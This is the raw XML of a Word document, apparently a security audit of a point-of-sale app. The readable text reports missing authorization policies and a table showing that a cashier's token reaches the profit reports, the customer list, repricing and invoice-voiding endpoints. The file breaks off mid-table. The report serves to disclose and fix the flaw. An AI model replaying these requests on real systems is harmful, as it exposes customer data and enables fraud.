                <v:rect id="Rectangle 572" o:spid="_x0000_s1089" style="position:absolute;left:13363;top:17328;width:10442;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106EED5E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> had an empty </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 573" o:spid="_x0000_s1090" style="position:absolute;left:21240;top:17145;width:5715;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="571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7xQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gq9iG40+C91FREK0l406v2Rfc2GZN+G7Fbjt+8WCh6HmfkNs972thE36nzlWMFknIAg&#10;LpyuuFRwOX+MliB8QNbYOCYFD/Kw3bwM1phpd+cT3fJQighhn6ECE0KbSekLQxb92LXE0ft2ncUQ&#10;ZVdK3eE9wm0jp0kylxYrjgsGW9obKur8xyqoD2n9+ZWshsOH3l/NcVrN6jRX6u21372DCNSHZ/i/&#10;fdAKZosU/s7EIyA3vwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDHDI/7xQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l561975,v2630,,4875,930,6735,2787c570570,4648,571500,6896,571500,9525r,114300c571500,126454,570570,128699,568710,130559v-1860,1858,-4105,2788,-6735,2791l9525,133350v-2630,-3,-4875,-933,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,571500,133350"/>
                </v:shape>
                <v:rect id="Rectangle 574" o:spid="_x0000_s1091" style="position:absolute;left:21484;top:17381;width:697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1041FDB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>$policies</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 575" o:spid="_x0000_s1092" style="position:absolute;left:27000;top:17328;width:1734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246BC796" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> array, and there was no </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 576" o:spid="_x0000_s1093" style="position:absolute;left:40004;top:17145;width:7525;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7524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xQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhb6D2EJvjZyQ5seJEkJIaXsyTfMAG2tjm1grIcmO+/ZVoZDjMDPfMOvtYFrRkw+NZQXjUQaC&#10;uLS64UrB6fvtZQEiRGSNrWVS8EMBtpvHhzXm2t74i/pjrESCcMhRQR2jy6UMZU0Gw8g64uRdrDcY&#10;k/SV1B5vCW5aOcmymTTYcFqo0dG+pvJ67IwC9z45+O5clIf57nPZW9dNi6JT6vlp2K1ARBriPfzf&#10;/tAKXucz+DuTjoDc/AIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAqt/N+xQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l742950,v2631,,4876,930,6736,2787c751546,4648,752475,6896,752475,9525r,114300c752475,126454,751546,128699,749686,130559v-1860,1858,-4105,2788,-6736,2791l9525,133350v-2630,-3,-4875,-933,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,752475,133350"/>
                </v:shape>
                <v:rect id="Rectangle 577" o:spid="_x0000_s1094" style="position:absolute;left:40310;top:17381;width:930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54344820" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>Gate::</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>define</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 578" o:spid="_x0000_s1095" style="position:absolute;left:47574;top:17328;width:1719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7F118AB0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> anywhere in the project.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D27C582" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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Exploit.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> With an ordinary cashier's token, not one of these was refused:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="108" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5248"/>
        <w:gridCol w:w="1185"/>
        <w:gridCol w:w="3761"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="08356730" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="435"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59D0E218" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5"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Request</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D7E92B4"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Result</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BCED104"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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="66537EE0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="435"/>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03C46306" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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1792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E84C010" wp14:editId="45C9190D">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1514475" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="27989" name="Group 27989"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1514475" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1514475" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="584" name="Shape 584"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1514475" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1514475" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1504950" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1507580" y="0"/>
                                        <a:pt x="1509825" y="930"/>
                                        <a:pt x="1511685" y="2787"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1513545" y="4648"/>
                                        <a:pt x="1514475" y="6896"/>
                                        <a:pt x="1514475" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1514475" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1514475" y="126454"/>
                                        <a:pt x="1513545" y="128699"/>
                                        <a:pt x="1511685" y="130556"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1509825" y="132417"/>
                                        <a:pt x="1507580" y="133347"/>
                                        <a:pt x="1504950" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133347"/>
                                        <a:pt x="4650" y="132417"/>
                                        <a:pt x="2790" y="130556"/>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989" style="width:119.25pt;height:10.5pt;position:absolute;z-index:-2147483522;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="15144,1333">
                      <v:shape id="Shape 584" style="position:absolute;width:15144;height:1333;left:0;top:0;" coordsize="1514475,133350" path="m9525,0l1504950,0c1507580,0,1509825,930,1511685,2787c1513545,4648,1514475,6896,1514475,9525l1514475,123825c1514475,126454,1513545,128699,1511685,130556c1509825,132417,1507580,133347,1504950,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128699,0,126454,0,123825l0,9525c0,6896,930,4648,2790,2787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GET /reports/daily-profit</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201794B4"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200</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43B087B8"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Company-wide profit and margin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="715130FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="439"/>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2C3739D5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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2816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ED2EFA6" wp14:editId="0D408AAD">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1333500" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28135" name="Group 28135"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1333500" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1333500" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="588" name="Shape 588"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1333500" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1333500" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1323975" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1326605" y="0"/>
                                        <a:pt x="1328850" y="927"/>
                                        <a:pt x="1330710" y="2787"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1332570" y="4648"/>
                                        <a:pt x="1333500" y="6893"/>
                                        <a:pt x="1333500" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1333500" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1333500" y="135979"/>
                                        <a:pt x="1332570" y="138221"/>
                                        <a:pt x="1330710" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1328850" y="141942"/>
                                        <a:pt x="1326605" y="142872"/>
                                        <a:pt x="1323975" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142872"/>
                                        <a:pt x="4650" y="141942"/>
                                        <a:pt x="2790" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138221"/>
                                        <a:pt x="0" y="135979"/>
                                        <a:pt x="0" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6893"/>
                                        <a:pt x="930" y="4648"/>
                                        <a:pt x="2790"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135" style="width:105pt;height:11.25pt;position:absolute;z-index:-2147483518;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="13335,1428">
                      <v:shape id="Shape 588" style="position:absolute;width:13335;height:1428;left:0;top:0;" coordsize="1333500,142875" path="m9525,0l1323975,0c1326605,0,1328850,927,1330710,2787c1332570,4648,1333500,6893,1333500,9525l1333500,133350c1333500,135979,1332570,138221,1330710,140081c1328850,141942,1326605,142872,1323975,142875l9525,142875c6895,142872,4650,141942,2790,140081c930,138221,0,135979,0,133350l0,9525c0,6893,930,4648,2790,2787c4650,927,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GET /reports/customers</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5DB26DC7"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200</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212A5D7C"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The entire customer list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="01BEB1DC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="435"/>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52D15D09" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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3840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0014BA63" wp14:editId="363F0989">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2152650" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28250" name="Group 28250"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="2152650" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="2152650" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="592" name="Shape 592"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="2152650" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="2152650" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="2143125" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2145755" y="0"/>
                                        <a:pt x="2148000" y="930"/>
                                        <a:pt x="2149860" y="2787"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2151720" y="4648"/>
                                        <a:pt x="2152650" y="6896"/>
                                        <a:pt x="2152650" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="2152650" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2152650" y="135979"/>
                                        <a:pt x="2151720" y="138224"/>
                                        <a:pt x="2149860" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="2148000" y="141942"/>
                                        <a:pt x="2145755" y="142872"/>
                                        <a:pt x="2143125" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142872"/>
                                        <a:pt x="4650" y="141942"/>
                                        <a:pt x="2790" y="140081"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138224"/>
                                        <a:pt x="0" y="135979"/>
                                        <a:pt x="0" y="133350"/>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250" style="width:169.5pt;height:11.25pt;position:absolute;z-index:-2147483514;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="21526,1428">
                      <v:shape id="Shape 592" style="position:absolute;width:21526;height:1428;left:0;top:0;" coordsize="2152650,142875" path="m9525,0l2143125,0c2145755,0,2148000,930,2149860,2787c2151720,4648,2152650,6896,2152650,9525l2152650,133350c2152650,135979,2151720,138224,2149860,140081c2148000,141942,2145755,142872,2143125,142875l9525,142875c6895,142872,4650,141942,2790,140081c930,138224,0,135979,0,133350l0,9525c0,6896,930,4648,2790,2787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POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>grn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-items/update-selling-price</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44EAF750"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200</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051E9820"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Reprice any stock batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="5C6A7974" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="446"/>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0BB9FB2C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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4864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B5D8EA2" wp14:editId="3F35B75E">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1104900" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28316" name="Group 28316"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1104900" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1104900" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="596" name="Shape 596"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1104900" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1104900" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1095375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1098005" y="0"/>
                                        <a:pt x="1100250" y="930"/>
                                        <a:pt x="1102110" y="2787"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1103970" y="4648"/>
                                        <a:pt x="1104900" y="6896"/>
                                        <a:pt x="1104900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1104900" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1104900" y="126454"/>
                                        <a:pt x="1103970" y="128699"/>
                                        <a:pt x="1102110" y="130559"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1100250" y="132420"/>
                                        <a:pt x="1098005" y="133350"/>
                                        <a:pt x="1095375" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133350"/>
                                        <a:pt x="4650" y="132420"/>
                                        <a:pt x="2790" y="130559"/>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316" style="width:87pt;height:10.5pt;position:absolute;z-index:-2147483510;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="11049,1333">
                      <v:shape id="Shape 596" style="position:absolute;width:11049;height:1333;left:0;top:0;" coordsize="1104900,133350" path="m9525,0l1095375,0c1098005,0,1100250,930,1102110,2787c1103970,4648,1104900,6896,1104900,9525l1104900,123825c1104900,126454,1103970,128699,1102110,130559c1100250,132420,1098005,133350,1095375,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4648,2790,2787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PUT /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>invoices/{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id}</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78E58DF1"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reached</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198347E9"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Void any sale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="23D9E052" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="435"/>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7BC23FBD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48"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5888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AC854D0" wp14:editId="426A63DD">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1571625" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28468" name="Group 28468"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1571625" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1571625" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="600" name="Shape 600"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1571625" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1571625" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1562100" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1564730" y="0"/>
                                        <a:pt x="1566975" y="930"/>
                                        <a:pt x="1568835" y="2787"/>
